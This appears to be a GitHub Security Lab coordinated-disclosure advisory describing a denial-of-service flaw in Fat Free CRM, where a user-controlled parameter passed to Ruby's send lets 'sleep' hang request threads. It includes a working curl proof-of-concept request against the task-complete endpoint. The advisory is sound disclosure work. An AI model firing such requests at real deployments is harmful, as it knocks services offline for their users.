Coordinated Disclosure Timeline
- 2022-09-07: Sent report to Fat Free CRM maintainers
- 2022-09-12: Maintainers acknowledged the existence of this vulnerability and started looking similar vulnerabilities
- 2022-10-07: Advisory was published
A denial of service vulnerability existed in Fat Free CRM where an authenticated attacker could have prevented the web application from handling any requests.
Fat Free CRM
Issue: Remote Denial of Service (
An authenticated user can perform a remote Denial of Service attack against Fat Free CRM. Fat Free CRM exposes several Task update endpoints that pass
params[:bucket] to the bucket_empty? method, which calls
send with the user-controllable
bucket parameter as argument. Ruby’s
send method calls any private or public method on an object including methods defined on parent classes such as
Kernel module is included by the class
Object, so its methods are available in every Ruby object.
Most public information about this type of vulnerability mentions the Kernel methods
exit! as destructive examples to pass to the
send method. However, in a Rails application this throws an exception and while it shuts the current request down, it doesn’t kill the server. We found out that the Kernel method
sleep might be a better candidate to stop a Rails application from answering requests. Calling
sleep without a duration parameter will make the current request thread sleep forever.
So, if a Rails application is started with a maximum of 5 threads (
RAILS_MAX_THREADS=5) in combination with 2 Puma workers (
WEB_CONCURRENCY=2) it will take 10 (2*5) requests to stop the Rails application from responding to any requests.
This vulnerability was found using a CodeQL query which identifies code injection.
Proof of concept
The following request sets the
sleep, which the application will be evaluated as
curl -i -s -k -X $'PUT' \ -H $'Host: 127.0.0.1:3000' -H $'Content-Length: 14' -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Connection: close' \ -b $'_fat_free_crm_session=[..]' \ --data-binary $'bucket=sleep' \ $'http://127.0.0.1:3000/tasks/26/complete'
(Hint: replace the
X-CSRF-Token header and the
_fat_free_crm_session cookie with valid (authenticated) values)
This issue may lead to Denial of Service (DOS).
This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).
You can contact the GHSL team at
email@example.com, please include a reference to
GHSL-2022-073 in any communication regarding this issue.